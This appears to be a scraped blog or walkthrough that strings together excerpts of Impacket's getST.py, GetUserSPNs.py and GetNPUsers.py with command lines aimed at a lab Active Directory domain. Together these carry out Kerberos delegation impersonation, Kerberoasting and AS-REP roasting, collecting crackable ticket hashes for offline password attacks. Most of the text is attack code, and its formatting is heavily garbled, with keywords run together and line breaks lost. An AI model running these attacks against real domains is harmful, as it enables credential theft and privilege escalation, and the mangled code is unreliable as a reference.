defrun(self):     userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)     tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,unhexlify(self.__lmhash), unhexlify(self.__nthash), self.__aesKey,self.__kdcHost)     self.saveTicket(tgt,oldSessionKey)

python getST.py domain.local/administrator:"Admin@123" -dc-ip 192.168.1.4 -spn ldap/WIN-O1LF3J0STCO.domain.local

try:if domain isNone:            logging.critical('Domain should be specified!')            sys.exit(1)if password == ''and username != ''and options.hashes isNoneand options.no_pass isFalseand options.aesKey isNone:from getpass import getpass            password = getpass("Password:")if options.aesKey isnotNone:            options.k = True        executer = GETST(username, password, domain, options)        executer.run()

def run(self):        tgt = None        # Do we have a TGT cached?        domain, _, TGT, _ = CCache.parseFile(self.__domain)        # ToDo: Check this TGT belogns to the right principalif TGT is not None:            tgt, cipher, sessionKey = TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']            oldSessionKey = sessionKeyif tgt is None:            # Still no TGT            userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)            logging.info('Getting TGT for user')            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,                                                                    unhexlify(self.__lmhash), unhexlify(self.__nthash),self.__aesKey,self.__kdcHost)

ifself.__options.impersonate isNone:            # NormalTGS interaction            logging.info('GettingSTfor user')            serverName =Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, self.__kdcHost, tgt, cipher, sessionKey)self.__saveFileName =self.__userelse:            # Here's the rock'n'rolltry:                logging.info('Impersonating%s' %self.__options.impersonate)                # Editing below to pass hashes for decryptionifself.__additional_ticket is not None:                    tgs, cipher, oldSessionKey, sessionKey =self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,self.__kdcHost, self.__additional_ticket)else:                    tgs, cipher, oldSessionKey, sessionKey =self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost)            except Exceptionas e:                logging.debug("Exception", exc_info=True)                logging.error(str(e))if str(e).find('KDC_ERR_S_PRINCIPAL_UNKNOWN') >=0:                    logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' %self.__user)if str(e).find('KDC_ERR_BADOPTION') >=0:                    logging.error('ProbablySPNis not allowed to delegate by user %s or initial TGT not forwardable' %self.__user)returnself.__saveFileName =self.__options.impersonateself.saveTicket(tgs, oldSessionKey)

try:    dumper = S4U2SELF(options.targetUser, username, password, domain, options.hashes)    dumper.dump()except Exception as e:    if logging.getLogger().level == logging.DEBUG:        import traceback        traceback.print_exc()    logging.error(str(e))

userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,                                                  unhexlify(self.__lmhash), unhexlify(self.__nthash))decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]

ticket = Ticket()ticket.from_asn1(decodedTGT['ticket'])apReq = AP_REQ()apReq['pvno'] = 5apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)opts = list()apReq['ap-options'] =  constants.encodeFlags(opts)seq_set(apReq,'ticket', ticket.to_asn1)authenticator = Authenticator()authenticator['authenticator-vno'] = 5authenticator['crealm'] = str(decodedTGT['crealm'])clientName = Principal()clientName.from_asn1( decodedTGT, 'crealm', 'cname')seq_set(authenticator, 'cname', clientName.components_to_asn1)now = datetime.datetime.utcnow()authenticator['cusec'] = now.microsecondauthenticator['ctime'] = KerberosTime.to_asn1(now)if logging.getLogger().level == logging.DEBUG:    logging.debug('AUTHENTICATOR')print(authenticator.prettyPrint())print ('n')encodedAuthenticator = encoder.encode(authenticator)# Key Usage 7# TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes# TGS authenticator subkey), encrypted with the TGS session# key (Section 5.5.1)encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)apReq['authenticator'] = noValueapReq['authenticator']['etype'] = cipher.enctypeapReq['authenticator']['cipher'] = encryptedEncodedAuthenticatorencodedApReq = encoder.encode(apReq)

tgsReq = TGS_REQ()tgsReq['pvno'] =  5tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)tgsReq['padata'] = noValuetgsReq['padata'][0] = noValuetgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)tgsReq['padata'][0]['padata-value'] = encodedApReq# In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service# requests a service ticket to itself on behalf of a user. The user is# identified to the KDC by the user's name and realm.clientName = Principal(self.__behalfUser, type=constants.PrincipalNameType.NT_PRINCIPAL.value)S4UByteArray = struct.pack('<I',constants.PrincipalNameType.NT_PRINCIPAL.value)S4UByteArray += b(self.__behalfUser) + b(self.__domain) + b'Kerberos'if logging.getLogger().level == logging.DEBUG:    logging.debug('S4UByteArray')    hexdump(S4UByteArray)# Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash# with the following three parameters: the session key of the TGT of# the service performing the S4U2Self request, the message type value# of 17, and the byte array S4UByteArray.checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)if logging.getLogger().level == logging.DEBUG:    logging.debug('CheckSum')    hexdump(checkSum)paForUserEnc = PA_FOR_USER_ENC()seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)paForUserEnc['userRealm'] = self.__domainpaForUserEnc['cksum'] = noValuepaForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)paForUserEnc['cksum']['checksum'] = checkSumpaForUserEnc['auth-package'] = 'Kerberos'if logging.getLogger().level == logging.DEBUG:    logging.debug('PA_FOR_USER_ENC')    print(paForUserEnc.prettyPrint())encodedPaForUserEnc = encoder.encode(paForUserEnc)tgsReq['padata'][1] = noValuetgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)tgsReq['padata'][1]['padata-value'] = encodedPaForUserEncreqBody = seq_set(tgsReq, 'req-body')opts = list()opts.append( constants.KDCOptions.forwardable.value )opts.append( constants.KDCOptions.renewable.value )opts.append( constants.KDCOptions.renewable_ok.value )opts.append( constants.KDCOptions.canonicalize.value )opts.append(constants.KDCOptions.enc_tkt_in_skey.value)reqBody['kdc-options'] = constants.encodeFlags(opts)serverName = Principal(self.__username, type=constants.PrincipalNameType.NT_UNKNOWN.value)#serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)seq_set(reqBody, 'sname', serverName.components_to_asn1)reqBody['realm'] = str(decodedTGT['crealm'])now = datetime.datetime.utcnow() + datetime.timedelta(days=1)reqBody['till'] = KerberosTime.to_asn1(now)reqBody['nonce'] = random.getrandbits(31)seq_set_iter(reqBody, 'etype',              (int(cipher.enctype),int(constants.EncryptionTypes.rc4_hmac.value)))# If you comment these two lines plus enc_tkt_in_skey as option, it is bassically a S4USelfmyTicket = ticket.to_asn1(TicketAsn1())seq_set_iter(reqBody, 'additional-tickets', (myTicket,))

tgs = decoder.decode(r, asn1Spec = TGS_REP())[0]if logging.getLogger().level == logging.DEBUG:    logging.debug('TGS_REP')    print(tgs.prettyPrint())cipherText = tgs['ticket']['enc-part']['cipher']# Key Usage 2# AS-REP Ticket and TGS-REP Ticket (includes tgs session key or#  application session key), encrypted with the service key#  (section 5.4.2)newCipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]# Pass the hash/aes key :Pif self.__nthash != '' and (isinstance(self.__nthash, bytes) and self.__nthash != b''):    key = Key(newCipher.enctype, unhexlify(self.__nthash))else:if newCipher.enctype == Enctype.RC4:        key = newCipher.string_to_key(password, '', None)else:        key = newCipher.string_to_key(password, self.__domain.upper()+self.__username, None)try:    # If is was plain U2U, thisis the key    plainText = newCipher.decrypt(key, 2, str(cipherText))except:    # S4USelf + U2U uses this other key    plainText = cipher.decrypt(sessionKey, 2, cipherText)self.printPdrqiac(plainText)

setspn -S MySQL/WIN-2016.domain.local:3306/MySQL administrator# 新增用户test

python GetUserSPNs.py domain.local/test:"Admin@123" -dc-ip 192.168.1.4 -request -debug

    try:        executer = GetUserSPNs(username, password, userDomain, targetDomain, options)        executer.run()    except Exception as e:        if logging.getLogger().level == logging.DEBUG:            import traceback            traceback.print_exc()        logging.error(str(e))

defrun(self):if self.__usersFile:        self.request_users_file_TGSs()returnif self.__kdcHost isnotNoneand self.__targetDomain == self.__domain:        self.__target = self.__kdcHostelse:if self.__kdcIP isnotNoneand self.__targetDomain == self.__domain:            self.__target = self.__kdcIPelse:            self.__target = self.__targetDomainif self.__doKerberos:            logging.info('Getting machine hostname')            self.__target = self.getMachineName(self.__target)

try:    ldapConnection = ldap.LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcIP)if self.__doKerberos isnotTrue:        ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)else:        ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,                                     self.__nthash,                                     self.__aesKey, kdcHost=self.__kdcIP)except ldap.LDAPSessionError as e:ifstr(e).find('strongerAuthRequired') >= 0:# We need to try SSL        ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcIP)        if self.__doKerberos is not True:            ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)        else:            ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,                                         self.__nthash,                                         self.__aesKey, kdcHost=self.__kdcIP)    else:        if str(e).find('NTLMAuthNegotiate') >= 0:            logging.critical("NTLM negotiation failed. Probably NTLM is disabled. Try to use Kerberos "                             "authentication instead.")        else:            if self.__kdcIP is not None and self.__kdcHost is not None:                logging.critical("If the credentials are valid, check the hostname and IP address of KDC. They "                                 "must match exactly each other")        raise

filter_spn = "servicePrincipalName=*"filter_person = "objectCategory=person"filter_not_disabled = "!(userAccountControl:1.2.840.113556.1.4.803:=2)"searchFilter = "(&"searchFilter += "(" + filter_person + ")"searchFilter += "(" + filter_not_disabled + ")"if self.__stealth isTrue:    logging.warning('Stealth option may cause huge memory consumption / out-of-memory errors on very large domains.')else:    searchFilter += "(" + filter_spn + ")"if self.__requestUser isnotNone:    searchFilter += '(sAMAccountName:=%s)' % self.__requestUsersearchFilter += ')'

try:    # Microsoft Active Directory set an hard limit of 1000 entries returned by any search    paged_search_control = ldapasn1.SimplePagedResultsControl(criticality=True, size=1000)    resp = ldapConnection.search(searchFilter=searchFilter,                                 attributes=['servicePrincipalName', 'sAMAccountName','pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],                                 searchControls=[paged_search_control])except ldap.LDAPSearchError as e:if e.getErrorString().find('sizeLimitExceeded') >= 0:        # We should never reach this code as we use paged search now        logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')        resp = e.getAnswers()        passelse:        raise

answers = []logging.debug('Total of records returned %d' % len(resp))for item in resp:ifisinstance(item, ldapasn1.SearchResultEntry) isnotTrue:continue    mustCommit = False    sAMAccountName = ''    memberOf = ''    SPNs = []    pwdLastSet = ''    userAccountControl = 0    lastLogon = 'N/A'    delegation = ''try:for attribute in item['attributes']:ifstr(attribute['type']) == 'sAMAccountName':                sAMAccountName = str(attribute['vals'][0])                mustCommit = Trueelifstr(attribute['type']) == 'userAccountControl':                userAccountControl = str(attribute['vals'][0])ifint(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:                    delegation = 'unconstrained'elifint(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:                    delegation = 'constrained'elifstr(attribute['type']) == 'memberOf':                memberOf = str(attribute['vals'][0])elifstr(attribute['type']) == 'pwdLastSet':ifstr(attribute['vals'][0]) == '0':                    pwdLastSet = '<never>'else:                    pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))elifstr(attribute['type']) == 'lastLogon':ifstr(attribute['vals'][0]) == '0':                    lastLogon = '<never>'else:                    lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))elifstr(attribute['type']) == 'servicePrincipalName':for spn in attribute['vals']:                    SPNs.append(str(spn))if mustCommit isTrue:ifint(userAccountControl) & UF_ACCOUNTDISABLE:                logging.debug('Bypassing disabled account %s ' % sAMAccountName)else:for spn in SPNs:                    answers.append([spn, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation])except Exception as e:        logging.error('Skipping item, cannot process due to error %s' % str(e))pass

if len(answers) >0:self.printTable(answers, header=["ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon","Delegation"])print('nn')ifself.__requestTGS isTrue or self.__requestUser is not None:        # Let's get unique user names and a SPN to request a TGSfor        users = dict((vals[1], vals[0]) for vals in answers)        # Get a TGTfor the current userTGT=self.getTGT()ifself.__outputFileName is not None:            fd =open(self.__outputFileName, 'w+')else:            fd =Nonefor user, SPNin users.items():            sAMAccountName = user            downLevelLogonName =self.__targetDomain +"\"+ sAMAccountNametry:                principalName =Principal()                principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value                principalName.components = [downLevelLogonName]                tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,self.__kdcIP,TGT['KDC_REP'], TGT['cipher'],TGT['sessionKey'])self.outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName,self.__targetDomain +"/"+ sAMAccountName, fd)            except Exceptionas e:                logging.debug("Exception:", exc_info=True)                logging.error('Principal: %s -%s' % (downLevelLogonName, str(e)))if fd is not None:            fd.close()else:print("No entries found!")

python GetNPUsers.py domain.local/administrator:Admin@123 -request -outputfile results.txt

try:    executer = GetUserNoPreAuth(username, password, domain, options)    executer.run()except Exception as e:    logging.debug("Exception:", exc_info=True)    logging.error(str(e))

try:    ldapConnection = ldap.LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcIP)if self.__doKerberos isnotTrue:        ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)else:        ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,                                     self.__aesKey, kdcHost=self.__kdcIP)

searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)""(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" %                (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)try:    logging.debug('Search Filter=%s' % searchFilter)    resp = ldapConnection.search(searchFilter=searchFilter,                                 attributes=['sAMAccountName','pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],sizeLimit=999)

for item in resp:ifisinstance(item, ldapasn1.SearchResultEntry) isnotTrue:continue    mustCommit = False    sAMAccountName =  ''    memberOf = ''    pwdLastSet = ''    userAccountControl = 0    lastLogon = 'N/A'try:for attribute in item['attributes']:ifstr(attribute['type']) == 'sAMAccountName':                sAMAccountName = str(attribute['vals'][0])                mustCommit = Trueelifstr(attribute['type']) == 'userAccountControl':                userAccountControl = "0x%x" % int(attribute['vals'][0])elifstr(attribute['type']) == 'memberOf':                memberOf = str(attribute['vals'][0])elifstr(attribute['type']) == 'pwdLastSet':ifstr(attribute['vals'][0]) == '0':                    pwdLastSet = '<never>'else:                    pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))elifstr(attribute['type']) == 'lastLogon':ifstr(attribute['vals'][0]) == '0':                    lastLogon = '<never>'else:                    lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))if mustCommit isTrue:            answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])except Exception as e:        logging.debug("Exception:", exc_info=True)        logging.error('Skipping item, cannot process due to error %s' % str(e))passiflen(answers)>0:    self.printTable(answers, header=[ "Name", "MemberOf", "PasswordLastSet", "LastLogon", "UAC"])print('nn')if self.__requestTGT isTrue:        usernames = [answer[0] for answer in answers]        self.request_multiple_TGTs(usernames)else:print("No entries found!")

defrequest_multiple_TGTs(self, usernames):if self.__outputFileName isnotNone:            fd = open(self.__outputFileName, 'w+')else:            fd = Nonefor username in usernames:try:                entry = self.getTGT(username)                self.outputTGT(entry, fd)except Exception as e:                logging.error('%s' % str(e))if fd isnotNone:            fd.close()